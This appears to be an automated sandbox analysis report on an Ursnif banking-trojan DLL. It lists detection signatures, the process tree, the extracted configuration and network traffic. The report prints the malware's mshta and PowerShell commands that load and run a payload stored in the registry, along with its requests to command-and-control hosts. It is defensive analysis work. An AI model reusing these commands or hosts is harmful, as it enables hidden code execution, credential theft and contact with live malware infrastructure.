Loading ...

Play interactive tourEdit tour

Analysis Report SecuriteInfo.com.Generic.mg.f76b81b0397ae313.25278

Overview

General Information

Sample Name:SecuriteInfo.com.Generic.mg.f76b81b0397ae313.25278 (renamed file extension from 25278 to dll)
Analysis ID:353281
MD5:f76b81b0397ae313b8f6d19d95c49edf
SHA1:8f15106b524cc5db564845508a04ee3bf2709949
SHA256:3e8b92cda2c0d1dc74de0b060f43c2baf23ab08af69667ddbbe66f78d5e0389a

Most interesting Screenshot:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Dot net compiler compiles file from suspicious location
Yara detected Ursnif
Allocates memory in foreign processes
Changes memory attributes in foreign processes to executable or writable
Compiles code for process injection (via .Net compiler)
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Hooks registry keys query functions (used to hide registry keys)
Injects code into the Windows Explorer (explorer.exe)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the export address table of user mode modules (user mode EAT hooks)
Modifies the import address table of user mode modules (user mode IAT hooks)
Modifies the prolog of user mode functions (user mode inline hooks)
Sigma detected: MSHTA Spawning Windows Shell
Suspicious powershell command line found
Tries to steal Mail credentials (via file access)
Writes or reads registry keys via WMI
Writes registry values via WMI
Writes to foreign memory regions
Compiles C# or VB.Net code
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file does not import any functions
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Registers a DLL
Searches for the Microsoft Outlook file path
Sigma detected: Suspicious Rundll32 Activity
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Startup

  • System is w10x64
  • loaddll32.exe (PID: 5576 cmdline: loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dll' MD5: 8081BC925DFC69D40463079233C90FA5)
    • regsvr32.exe (PID: 5876 cmdline: regsvr32.exe /s C:\Users\user\Desktop\SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
      • control.exe (PID: 5528 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
        • rundll32.exe (PID: 6488 cmdline: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A)
    • cmd.exe (PID: 1440 cmdline: C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • iexplore.exe (PID: 1380 cmdline: C:\Program Files\Internet Explorer\iexplore.exe MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
        • iexplore.exe (PID: 6192 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1380 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
        • iexplore.exe (PID: 6552 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1380 CREDAT:82962 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
        • iexplore.exe (PID: 6864 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1380 CREDAT:17422 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
        • iexplore.exe (PID: 6940 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1380 CREDAT:82978 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • mshta.exe (PID: 492 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 5424 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 5428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 4136 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\gayi4abp\gayi4abp.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 5732 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES3AD7.tmp' 'c:\Users\user\AppData\Local\Temp\gayi4abp\CSC8A545143BD644266B89F65F281FEEFE4.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 6124 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\wi0gyoxl\wi0gyoxl.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 2920 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES4CF7.tmp' 'c:\Users\user\AppData\Local\Temp\wi0gyoxl\CSCA00873215094E3995281D323D18ADB7.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmd.exe (PID: 6908 cmdline: cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\9090.bi1' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"server": "730", "os": "10.0_0_17134_x64", "version": "250180", "uptime": "353", "system": "2f28121f12f6b0f75396fd38214a7a6chh0N", "size": "202829", "crc": "2", "action": "00000000", "id": "1100", "time": "1613433491", "user": "902d52678695dc15e71ab15c1d8e8ed0", "hash": "0xf857f57e", "soft": "3"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000017.00000003.823839422.000001F6E1200000.00000004.00000001.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000017.00000003.823839422.000001F6E1200000.00000004.00000001.sdmpGoziRuleWin32.GoziCCN-CERT
    • 0x8f0:$: 63 00 6F 00 6F 00 6B 00 69 00 65 00 73 00 2E 00 73 00 71 00 6C 00 69 00 74 00 65 00 2D 00 6A 00 ...
    00000002.00000003.756834396.0000000005F28000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000002.00000003.757094154.0000000005F28000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000002.00000003.765016021.0000000005DAB000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          Click to see the 30 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Dot net compiler compiles file from suspicious locationShow sources
          Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\gayi4abp\gayi4abp.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\gayi4abp\gayi4abp.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5424, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\gayi4abp\gayi4abp.cmdline', ProcessId: 4136
          Sigma detected: MSHTA Spawning Windows ShellShow sources
          Source: Process startedAuthor: Michael Haag: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 492, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ProcessId: 5424
          Sigma detected: Suspicious Rundll32 ActivityShow sources
          Source: Process startedAuthor: juju4: Data: Command: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, CommandLine: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: C:\Windows\system32\control.exe -h, ParentImage: C:\Windows\System32\control.exe, ParentProcessId: 5528, ProcessCommandLine: 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h, ProcessId: 6488

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus detection for URL or domainShow sources
          Source: http://c56.lepini.at/jvassets/xI/t64.datAvira URL Cloud: Label: phishing
          Found malware configurationShow sources
          Source: regsvr32.exe.5876.2.memstrMalware Configuration Extractor: Ursnif {"server": "730", "os": "10.0_0_17134_x64", "version": "250180", "uptime": "353", "system": "2f28121f12f6b0f75396fd38214a7a6chh0N", "size": "202829", "crc": "2", "action": "00000000", "id": "1100", "time": "1613433491", "user": "902d52678695dc15e71ab15c1d8e8ed0", "hash": "0xf857f57e", "soft": "3"}
          Multi AV Scanner detection for domain / URLShow sources
          Source: c56.lepini.atVirustotal: Detection: 8%Perma Link
          Source: api3.lepini.atVirustotal: Detection: 10%Perma Link
          Source: api10.laptok.atVirustotal: Detection: 10%Perma Link
          Multi AV Scanner detection for submitted fileShow sources
          Source: SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dllVirustotal: Detection: 16%Perma Link
          Source: SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dllReversingLabs: Detection: 10%

          Compliance:

          barindex
          Uses 32bit PE filesShow sources
          Source: SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
          Uses new MSVCR DllsShow sources
          Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dllJump to behavior
          Uses secure TLS version for HTTPS connectionsShow sources
          Source: unknownHTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.4:49746 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.4:49747 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49764 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49763 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49759 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49760 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49761 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49762 version: TLS 1.2
          Binary contains paths to debug symbolsShow sources
          Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 0000001A.00000002.810092544.0000017964DD0000.00000002.00000001.sdmp, csc.exe, 0000001C.00000002.818415180.0000022D72ED0000.00000002.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000020.00000000.838540739.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: ntdll.pdb source: regsvr32.exe, 00000002.00000003.832600634.0000000006750000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: explorer.exe, 00000020.00000003.877702647.0000000006AD0000.00000004.00000001.sdmp
          Source: Binary string: ntdll.pdbUGP source: regsvr32.exe, 00000002.00000003.832600634.0000000006750000.00000004.00000001.sdmp
          Source: Binary string: \wl.pdb9 source: powershell.exe, 00000017.00000003.858136800.000001F6E100F000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdb source: explorer.exe, 00000020.00000003.877702647.0000000006AD0000.00000004.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000020.00000000.838540739.0000000005A00000.00000002.00000001.sdmp
          Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_033F3512 Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,2_2_033F3512
          Source: C:\Windows\explorer.exeCode function: 32_2_04DB7500 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,RtlDeleteBoundaryDescriptor,32_2_04DB7500
          Source: C:\Windows\explorer.exeCode function: 32_2_04DBAACC CreateFileA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,32_2_04DBAACC
          Source: global trafficHTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at
          Source: Joe Sandbox ViewIP Address: 104.20.184.68 104.20.184.68
          Source: Joe Sandbox ViewIP Address: 151.101.1.44 151.101.1.44
          Source: Joe Sandbox ViewASN Name: GOOGLE-AS-APGoogleAsiaPacificPteLtdSG GOOGLE-AS-APGoogleAsiaPacificPteLtdSG
          Source: Joe Sandbox ViewJA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c
          Source: global trafficHTTP traffic detected: GET /api1/soyCaKjlo/B74XWyII6dEV1I0Co4Ut/l9VT5RjBdu9gqXWslrY/xc_2FK3McGJ0IzvFP1vJkO/Am1fQoOyYzGbM/xK7yrntx/Hruw1HZvAcfYl7dS_2F5g51/rLGjgSsh9h/OW8nevv3Dh4VYPuXW/03beET_2FA3a/YKD8HGeNgat/jK8A9eho17ABaL/cUew4H72hIfxngPdnFseX/f9MvJYHFQTCCYMoN/XdpbU1hBHNX722p/DPf7k1CgkBZqmPOtaO/MB_2B0Lh_/2FdHYj_2Bx0ZSPs6m_2F/GelX35xSpPMKNfn0Q3D/54O_2FBBcuPBTrZpvB9zhY/7AC9yYriaqcnPDRgK/E HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /api1/ACRDYIo3vDDkE8nBO7rZ_2F/RKqyjTnG2z/bw24fKr8FPY8iC_2F/NOd8pP1qrd_2/B0zRVNFer70/12v4aw2Bat1oWp/EdxqaQHccPmd48WBI_2Fh/ZsZf5oFs1F5WVpMV/Aql6isAZLQXMGYV/uCpbF51_2FaHU68PIY/HN1L8Jeq6/71Of32mfKV_2FEsbc40d/blSVHi4z_2F2u7ZVT2S/LNeMbeXi5H54yUd71Yke04/YvCLg_2BV_2FO/HHmC2v0g/tP9YiJq20QZR4sjpPzGs48R/leCqM3qCaD/cvMCdxcgqejP1dFql/2a73eaCZuJLy/90fQzPpEVBC/OzDkRB7t1Aba9y/CFI HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /api1/_2FrbYdUuuog2_2Ft/o0Q4kJ3uiNvB/BVkhCT_2FjP/kgnCFaoGSZ_2FP/XoK_2BtWhs_2FNzdBvmlH/vt_2B9x1x6ck65MR/ZpG7Z5d4NVWsbef/IA3fJ5Djq3zGkBqE7x/LReOBCAcB/qC_2F1dmcLdFTOEEnZgz/STGZ2dxkKMV5RKreGCr/RFkW6kLd_2Bklvq9QHSZcn/We3rTC8YPIxkv/L14t5cJM/ZLd1Hb81ZBMybrjlIjy_2Fg/_2F_2FS_2F/TBW_2Bf883H2QksUF/tthcWoumhUqM/8KeCGS7jeEC/1wCg0gHPiLWtYc/_2Fsv97M6I2fbFhoAJh9s/q_2FhY0fUvPWozDY/zNJTP3X_2B7F8/ha HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at
          Source: global trafficHTTP traffic detected: GET /api1/_2F5TIxM/R_2B3lAdX7FSifvLwGRNf4T/Xn6jTZLuMx/wh5E4h_2FPyrBTqQP/YDN8egogNxbu/ymacPdIkir0/NKKNzqD2vuGYxD/EQ2iBv1vi_2FKgbC6jRvO/67ImFcDLm_2FOZDz/QiB35x1OBx9fyp0/LL2dXEqoTiSnjkl_2B/cqWZBDCtg/kw_2BqWxxyjtsXEtMuCO/OQivEAtVKK4aYWaKL3G/xgxPJ7qQNKlWaEOMoFWGiX/qJDWe3oU_2FIN/ksLvpLmR/pIAQEZhwMl9o8sI2Dx0z5d9/PBFpDZPttD/KT6P6hofH96qtO4zq/sMAC80l_2B/o HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0Host: api3.lepini.at
          Source: global trafficHTTP traffic detected: GET /api1/CVY_2B2WcFg2WjFu/gTASghvlaHDPZO5/OnfU03dRZmchUYorkJ/dtBA9sUmC/RowLHURoIpKv4i_2BgTY/G_2FIDqlTidiAlM0ssd/yjlpSbFr2QpoSO_2FENF6f/dTadM34HuUeK4/m4bwoeqS/4fYaIXnfqcsUEE_2FB4NB_2/FC2CDtfTvl/j09rSh75dvBI36PLe/jkDP0mf1Pjoo/MVDfZBDaObB/6QQIVykudU_2Fa/gB7utb_2BlN2NWtlVRg_2/BGfyNFafrreq_2B2/aeR3kQJGNtvuKDQ/P4hWZXg9_2BWc1HVsP/HL5s0z5R3/Zml2TISAgHQ/gJzI HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0Host: api3.lepini.at
          Source: unknownDNS traffic detected: queries for: www.msn.com
          Source: unknownHTTP traffic detected: POST /api1/Khaq04rDnev_2/FB_2BFzU/KI8bdPSAY3R_2FidTJv71m3/dvU3r7d2eL/scd3pdNtCTeJ_2Frq/OWGS0ExfsOsM/_2BPwAW1LdR/SHcm3WZGYcVW6D/WtMm_2BnA73XtQqx5ww7P/YAGrQTEZeVeHRogx/_2B99ZfB_2FmilX/7ChN3r52DnFdh04GaB/pT5_2FX83/Scw9iSPgYS8zehsLEcf9/v_2BuI3_2FeSXD8dbjK/TGxhWKgJt8_2B4wSzTBFun/2pwogTmb20mC4/H981V6qe/2_2BDwr9k_2Bpe4F_2BBGiU/1EiWwRg_2F/w_2FIQs5ggG07bgU_/2BwAzRket4TL/oTov HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0Content-Length: 2Host: api3.lepini.at
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 15 Feb 2021 23:58:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
          Source: regsvr32.exe, 00000002.00000003.779376557.000000000362E000.00000004.00000001.sdmp, explorer.exe, 00000020.00000000.850009124.000000000FCFE000.00000004.00000001.sdmpString found in binary or memory: http://api10.laptok.at/api1/_2FrbYdUuuog2_2Ft/o0Q4kJ3uiNvB/BVkhCT_2FjP/kgnCFaoGSZ_2FP/XoK_2BtWhs_2FN
          Source: explorer.exe, 00000020.00000000.850009124.000000000FCFE000.00000004.00000001.sdmpString found in binary or memory: http://api10.laptok.at/api1/soyCaKjlo/B74XWyII6dEV1I0Co4Ut/l9VT5RjBdu9gqXWslrY/xc_2FK3McGJ0IzvFP1vJk
          Source: powershell.exe, 00000017.00000003.823839422.000001F6E1200000.00000004.00000001.sdmp, explorer.exe, 00000020.00000002.1032085877.0000000004DDE000.00000004.00000001.sdmpString found in binary or memory: http://constitution.org/usdeclar.txt
          Source: powershell.exe, 00000017.00000003.823839422.000001F6E1200000.00000004.00000001.sdmp, explorer.exe, 00000020.00000002.1032085877.0000000004DDE000.00000004.00000001.sdmpString found in binary or memory: http://constitution.org/usdeclar.txtC:
          Source: powershell.exe, 00000017.00000003.823839422.000001F6E1200000.00000004.00000001.sdmp, explorer.exe, 00000020.00000002.1032085877.0000000004DDE000.00000004.00000001.sdmpString found in binary or memory: http://https://file://USER.ID%lu.exe/upd
          Source: powershell.exe, 00000017.00000002.887499451.000001F6D8B95000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: powershell.exe, 00000017.00000002.860212545.000001F6C8D40000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: powershell.exe, 00000017.00000002.859665043.000001F6C8B31000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: explorer.exe, 00000020.00000002.1020876214.0000000002B50000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: powershell.exe, 00000017.00000002.860212545.000001F6C8D40000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: powershell.exe, 00000017.00000003.858426776.000001F6E137C000.00000004.00000001.sdmpString found in binary or memory: http://www.microsoft.co
          Source: powershell.exe, 00000017.00000002.887499451.000001F6D8B95000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 00000017.00000002.887499451.000001F6D8B95000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 00000017.00000002.887499451.000001F6D8B95000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
          Source: powershell.exe, 00000017.00000002.860212545.000001F6C8D40000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 00000017.00000002.887499451.000001F6D8B95000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe
          Source: explorer.exe, 00000020.00000000.844032000.000000000A897000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
          Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
          Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
          Source: unknownHTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.4:49746 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.4:49747 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49764 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49763 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49759 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49760 version: TLS 1.2
